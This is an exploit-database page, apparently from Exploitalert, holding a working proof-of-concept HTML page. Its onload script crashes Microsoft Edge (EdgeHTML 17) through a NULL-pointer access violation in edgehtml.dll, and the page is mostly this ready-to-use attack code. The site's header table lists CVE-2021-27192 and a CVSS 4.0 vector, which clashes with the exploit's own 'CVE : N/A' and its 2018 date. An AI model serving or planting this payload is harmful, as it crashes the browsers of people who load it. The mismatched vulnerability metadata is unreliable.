Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-27192 | CWE-770 | Not disclosed | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Not specified | High | Remote | 2018-12-24 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H | 0.02192 | 0.50148 |
# Exploit Title: Microsoft Edge edgehtml.dll!Tree::ANode::DocumentLayout. Denial of Service (PoC) # Google Dork: N/A # Date: 2018-11-11 # Exploit Author: Bogdan Kurinnoy ([email protected]) # Vendor Homepage: https://www.microsoft.com/ # Version: Microsoft Edge 42.17134.1.0 (Microsoft EdgeHTML 17.17134) # Tested on: Windows 10 x64 # CVE : N/A # Description: # Access violation while reading memory at 0x5C using a NULL pointer (microsoftedgecp.exe!edgehtml.dll!Tree::ANode::DocumentLayout) # https://developer.microsoft.com/en-us/microsoft-edge/platform/issues/19594021/ PoC.html <html> <head> <script> function ff() { var v4= document.elementFromPoint(0,0); v2.label = "C"; var v3= document.execCommand("selectAll", true); } </script> </head> <body onload=ff()> <select id="1" multiple="multiple"> <optgroup id="v2" label="A"> <option id="v1"> </body> </html>
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.